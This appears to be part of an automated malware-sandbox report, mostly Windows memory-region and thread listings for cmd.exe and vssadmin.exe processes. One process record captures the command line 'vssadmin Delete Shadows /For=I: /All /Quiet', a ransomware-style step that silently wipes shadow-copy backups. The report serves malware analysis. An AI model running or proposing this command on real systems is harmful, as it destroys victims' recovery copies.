	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 4958
	        start_va = 0x7ff957800000
	          end_va = 0x7ff957e43fff
	       monitored = 0
	     entry_point = 0x7ff9579c64b0
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 4959
	        start_va = 0x7ff9590c0000
	          end_va = 0x7ff959166fff
	       monitored = 0
	     entry_point = 0x7ff9590d58d0
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 4960
	        start_va = 0x7ff9587b0000
	          end_va = 0x7ff958801fff
	       monitored = 0
	     entry_point = 0x7ff9587bf530
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 4961
	        start_va = 0x7ff9574b0000
	          end_va = 0x7ff9574befff
	       monitored = 0
	     entry_point = 0x7ff9574b3210
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 4981
	        start_va = 0x7ff958070000
	          end_va = 0x7ff958124fff
	       monitored = 0
	     entry_point = 0x7ff9580b22e0
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 4982
	        start_va = 0x7ff9574d0000
	          end_va = 0x7ff95751afff
	       monitored = 0
	     entry_point = 0x7ff9574d35f0
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 4983
	        start_va = 0x7ff957490000
	          end_va = 0x7ff9574a3fff
	       monitored = 0
	     entry_point = 0x7ff9574952e0
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 4987
	        start_va = 0x7ff955e10000
	          end_va = 0x7ff955ea5fff
	       monitored = 0
	     entry_point = 0x7ff955e35570
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 4988
	        start_va = 0x1f6d53b0000
	          end_va = 0x1f6d555ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f6d53b0000"
	        filename = ""

Region:
	              id = 4989
	        start_va = 0x1f6d5560000
	          end_va = 0x1f6d556ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f6d5560000"
	        filename = ""

Region:
	              id = 5001
	        start_va = 0x1f6d5570000
	          end_va = 0x1f6d58a6fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 5002
	        start_va = 0x1f6d3960000
	          end_va = 0x1f6d3980fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "cmd.exe.mui"
	        filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")

Region:
	              id = 5003
	        start_va = 0x1f6d3b70000
	          end_va = 0x1f6d3bc9fff
	       monitored = 1
	     entry_point = 0x1f6d3b853f0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")

Region:
	              id = 5004
	        start_va = 0x1f6d3c80000
	          end_va = 0x1f6d3c8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f6d3c80000"
	        filename = ""

Region:
	              id = 5005
	        start_va = 0x1f6d58b0000
	          end_va = 0x1f6d5acafff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f6d58b0000"
	        filename = ""

Region:
	              id = 5008
	        start_va = 0x1f6d5ad0000
	          end_va = 0x1f6d5ce5fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f6d5ad0000"
	        filename = ""

Region:
	              id = 5009
	        start_va = 0x1f6d53b0000
	          end_va = 0x1f6d54c1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f6d53b0000"
	        filename = ""

Region:
	              id = 5010
	        start_va = 0x1f6d5550000
	          end_va = 0x1f6d555ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f6d5550000"
	        filename = ""

Region:
	              id = 5011
	        start_va = 0x1f6d5cf0000
	          end_va = 0x1f6d5f0bfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f6d5cf0000"
	        filename = ""

Region:
	              id = 5016
	        start_va = 0x1f6d5f10000
	          end_va = 0x1f6d6023fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f6d5f10000"
	        filename = ""

Region:
	              id = 5041
	        start_va = 0xf13f980000
	          end_va = 0xf13f9bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000f13f980000"
	        filename = ""

Region:
	              id = 5042
	        start_va = 0x7ff9589e0000
	          end_va = 0x7ff958b39fff
	       monitored = 0
	     entry_point = 0x7ff958a238e0
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")

Region:
	              id = 5050
	        start_va = 0x1f6d3960000
	          end_va = 0x1f6d3960fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001f6d3960000"
	        filename = ""

Region:
	              id = 5051
	        start_va = 0x1f6d3b70000
	          end_va = 0x1f6d3c2bfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001f6d3b70000"
	        filename = ""

Region:
	              id = 5052
	        start_va = 0x1f6d3960000
	          end_va = 0x1f6d3963fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001f6d3960000"
	        filename = ""

Region:
	              id = 5053
	        start_va = 0x7ff955420000
	          end_va = 0x7ff955441fff
	       monitored = 0
	     entry_point = 0x7ff955421a40
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")

Region:
	              id = 5059
	        start_va = 0x7ff955ba0000
	          end_va = 0x7ff955bb2fff
	       monitored = 0
	     entry_point = 0x7ff955ba2760
	     region_type = mapped_file
	            name = "wtsapi32.dll"
	        filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")

Region:
	              id = 5060
	        start_va = 0x7ff9572a0000
	          end_va = 0x7ff9572f5fff
	       monitored = 0
	     entry_point = 0x7ff9572b0bf0
	     region_type = mapped_file
	            name = "winsta.dll"
	        filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")

Region:
	              id = 5061
	        start_va = 0x1f6d3970000
	          end_va = 0x1f6d3976fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001f6d3970000"
	        filename = ""

Region:
	              id = 5062
	        start_va = 0x1f6d3980000
	          end_va = 0x1f6d3980fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001f6d3980000"
	        filename = ""

Region:
	              id = 5063
	        start_va = 0x1f6d3990000
	          end_va = 0x1f6d3990fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001f6d3990000"
	        filename = ""

Region:
	              id = 5064
	        start_va = 0x1f6d39a0000
	          end_va = 0x1f6d39a4fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "user32.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")

Region:
	              id = 5065
	        start_va = 0x1f6d3c30000
	          end_va = 0x1f6d3c30fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "conhostv2.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui")

Region:
	              id = 5067
	        start_va = 0x1f6d3c40000
	          end_va = 0x1f6d3c41fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001f6d3c40000"
	        filename = ""

Region:
	              id = 5068
	        start_va = 0x7ff94c7c0000
	          end_va = 0x7ff94ca33fff
	       monitored = 0
	     entry_point = 0x7ff94c830400
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll")

Region:
	              id = 5069
	        start_va = 0x1f6d3c50000
	          end_va = 0x1f6d3c50fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "windowsshell.manifest"
	        filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")

Region:
	              id = 5070
	        start_va = 0x1f6d3c60000
	          end_va = 0x1f6d3c61fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001f6d3c60000"
	        filename = ""


Thread:
	id = 364
	os_tid = 0xaf0


Thread:
	id = 365
	os_tid = 0x8b0


Thread:
	id = 366
	os_tid = 0x40c


Thread:
	id = 372
	os_tid = 0x11c4


Process:
	id = "67"
	image_name = "vssadmin.exe"
	filename = "c:\\windows\\syswow64\\vssadmin.exe"
	page_root = "0x2b9bc000"
	os_pid = "0xb88"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "61"
	os_parent_pid = "0x4f4"
	cmd_line = "vssadmin  Delete Shadows /For=I: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 4963
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 4964
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 4965
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 4966
	        start_va = 0x90000
	          end_va = 0xcffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 4967
	        start_va = 0xd0000
	          end_va = 0xd3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000d0000"
	        filename = ""

Region:
	              id = 4968
	        start_va = 0xe0000
	          end_va = 0xe0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000e0000"
	        filename = ""

Region:
	              id = 4969
	        start_va = 0xf0000
	          end_va = 0xf1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000000f0000"
	        filename = ""

Region:
	              id = 4970
	        start_va = 0x200000
	          end_va = 0x3fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000200000"
	        filename = ""

Region:
	              id = 4971
	        start_va = 0x670000
	          end_va = 0x671fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000670000"
	        filename = ""

Region:
	              id = 4972
	        start_va = 0x860000
	          end_va = 0x87dfff
	       monitored = 0
	     entry_point = 0x875810
	     region_type = mapped_file
	            name = "vssadmin.exe"
	        filename = "\\Windows\\SysWOW64\\vssadmin.exe" (normalized: "c:\\windows\\syswow64\\vssadmin.exe")

Region:
	              id = 4973
	        start_va = 0x880000
	          end_va = 0x487ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000880000"
	        filename = ""

Region:
	              id = 4974
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 4975
	        start_va = 0x7f0f0000
	          end_va = 0x7f112fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f0f0000"
	        filename = ""

Region:
	              id = 4976
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 4977
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 4978
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 4979
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 4980
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 4984
	        start_va = 0x100000
	          end_va = 0x1dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000100000"
	        filename = ""

Region:
	              id = 4990
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 4991
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 4992
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 4994
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 4995
	        start_va = 0x4880000
	          end_va = 0x4b2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004880000"
	        filename = ""

Region:
	              id = 4996
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 4998
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 4999
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 5000
	        start_va = 0x7eff0000
	          end_va = 0x7f0effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007eff0000"
	        filename = ""

Region:
	              id = 5017
	        start_va = 0x100000
	          end_va = 0x1bdfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 5018
	        start_va = 0x1d0000
	          end_va = 0x1dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001d0000"
	        filename = ""

Region:
	              id = 5019
	        start_va = 0x670000
	          end_va = 0x673fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000670000"
	        filename = ""

Region:
	              id = 5020
	        start_va = 0x76630000
	          end_va = 0x766aafff
	       monitored = 0
	     entry_point = 0x7664e970
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")

Region:
	              id = 5021
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 5022
	        start_va = 0x400000
	          end_va = 0x43ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 5023
	        start_va = 0x440000
	          end_va = 0x47ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000440000"
	        filename = ""

Region:
	              id = 5024
	        start_va = 0x75f10000
	          end_va = 0x75f53fff
	       monitored = 0
	     entry_point = 0x75f29d80
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")

Region:
	              id = 5025
	        start_va = 0x75ba0000
	          end_va = 0x75c4cfff
	       monitored = 0
	     entry_point = 0x75bb4f00
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")

Region:
	              id = 5026
	        start_va = 0x73d70000
	          end_va = 0x73d8dfff
	       monitored = 0
	     entry_point = 0x73d7b640
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")

Region:
	              id = 5027
	        start_va = 0x73d60000
	          end_va = 0x73d69fff
	       monitored = 0
	     entry_point = 0x73d62a00
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")

Region:
	              id = 5028
	        start_va = 0x73e10000
	          end_va = 0x73e67fff
	       monitored = 0
	     entry_point = 0x73e525c0
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")

Region:
	              id = 5029
	        start_va = 0x76950000
	          end_va = 0x76a96fff
	       monitored = 0
	     entry_point = 0x76961cf0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")

Region:
	              id = 5030
	        start_va = 0x75dc0000
	          end_va = 0x75f0efff
	       monitored = 0
	     entry_point = 0x75e76820
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")

Region:
	              id = 5031
	        start_va = 0x6f9d0000
	          end_va = 0x6f9e7fff
	       monitored = 0
	     entry_point = 0x6f9d4820
	     region_type = mapped_file
	            name = "atl.dll"
	        filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll")

Region:
	              id = 5032
	        start_va = 0x6f9b0000
	          end_va = 0x6f9c0fff
	       monitored = 0
	     entry_point = 0x6f9b4670
	     region_type = mapped_file
	            name = "vsstrace.dll"
	        filename = "\\Windows\\SysWOW64\\vsstrace.dll" (normalized: "c:\\windows\\syswow64\\vsstrace.dll")

Region:
	              id = 5033
	        start_va = 0x76cf0000
	          end_va = 0x76d81fff
	       monitored = 0
	     entry_point = 0x76d28cf0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")

Region:
	              id = 5034
	        start_va = 0x73ed0000
	          end_va = 0x7408cfff
	       monitored = 0
	     entry_point = 0x73fb2a10
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")

Region:
	              id = 5035
	        start_va = 0x766b0000
	          end_va = 0x766f4fff
	       monitored = 0
	     entry_point = 0x766cde90
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")

Region:
	              id = 5036
	        start_va = 0x6f890000
	          end_va = 0x6f9aafff
	       monitored = 0
	     entry_point = 0x6f8d0930
	     region_type = mapped_file
	            name = "vssapi.dll"
	        filename = "\\Windows\\SysWOW64\\vssapi.dll" (normalized: "c:\\windows\\syswow64\\vssapi.dll")

Region:
	              id = 5037
	        start_va = 0x76aa0000
	          end_va = 0x76afefff
	       monitored = 0
	     entry_point = 0x76aa4af0
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")

Region:
	              id = 5038
	        start_va = 0x680000
	          end_va = 0x85ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000680000"
	        filename = ""

Region:
	              id = 5043
	        start_va = 0x480000
	          end_va = 0x607fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000480000"
	        filename = ""

Region:
	              id = 5044
	        start_va = 0x680000
	          end_va = 0x6a9fff
	       monitored = 0
	     entry_point = 0x685680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 5045
	        start_va = 0x850000
	          end_va = 0x85ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000850000"
	        filename = ""

Region:
	              id = 5046
	        start_va = 0x75b70000
	          end_va = 0x75b9afff
	       monitored = 0
	     entry_point = 0x75b75680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 5047
	        start_va = 0x680000
	          end_va = 0x800fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000680000"
	        filename = ""

Region:
	              id = 5048
	        start_va = 0x810000
	          end_va = 0x81cfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vssadmin.exe.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vssadmin.exe.mui")

Region:
	              id = 5049
	        start_va = 0x4b30000
	          end_va = 0x5f2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004b30000"
	        filename = ""

Region:
	              id = 5054
	        start_va = 0x20000
	          end_va = 0x20fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000020000"
	        filename = ""

Region:
	              id = 5055
	        start_va = 0x1c0000
	          end_va = 0x1c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 5056
	        start_va = 0x820000
	          end_va = 0x823fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000820000"
	        filename = ""

Region:
	              id = 5057
	        start_va = 0x4880000
	          end_va = 0x4969fff
	       monitored = 0
	     entry_point = 0x48bd650
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")

Region:
	              id = 5058
	        start_va = 0x4a30000
	          end_va = 0x4b2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004a30000"
	        filename = ""

Region:
	              id = 5066
	        start_va = 0x764a0000
	          end_va = 0x764abfff
	       monitored = 0
	     entry_point = 0x764a3930
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")

Region:
	              id = 5292
	        start_va = 0x830000
	          end_va = 0x830fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000830000"
	        filename = ""

Region:
	              id = 5293
	        start_va = 0x76700000
	          end_va = 0x76783fff
	       monitored = 0
	     entry_point = 0x76726220
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")

Region:
	              id = 5294
	        start_va = 0x840000
	          end_va = 0x840fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000840000"
	        filename = ""

Region:
	              id = 5359
	        start_va = 0x610000
	          end_va = 0x64ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000610000"
	        filename = ""

Region:
	              id = 5360
	        start_va = 0x4880000
	          end_va = 0x48bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004880000"
	        filename = ""

Region:
	              id = 5387
	        start_va = 0x48c0000
	          end_va = 0x48fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000048c0000"
	        filename = ""

Region:
	              id = 5388
	        start_va = 0x4900000
	          end_va = 0x493ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004900000"
	        filename = ""

Region:
	              id = 5389
	        start_va = 0x4940000
	          end_va = 0x497ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004940000"
	        filename = ""

Region:
	              id = 5390
	        start_va = 0x4980000
	          end_va = 0x49bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004980000"
	        filename = ""

Region:
	              id = 5476
	        start_va = 0x5f30000
	          end_va = 0x600ffff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "kernelbase.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui")

Region:
	              id = 5477
	        start_va = 0x6010000
	          end_va = 0x608ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000006010000"
	        filename = ""

Region:
	              id = 5478
	        start_va = 0x49c0000
	          end_va = 0x49c8fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vsstrace.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vsstrace.dll.mui")


Thread:
	id = 367
	os_tid = 0xbe0


Thread:
	id = 371
	os_tid = 0xbc8


Thread:
	id = 393
	os_tid = 0x1348


Thread:
	id = 395
	os_tid = 0x1238


Thread:
	id = 396
	os_tid = 0x128c


Process:
	id = "68"
	image_name = "cmd.exe"
	filename = "c:\\windows\\syswow64\\cmd.exe"
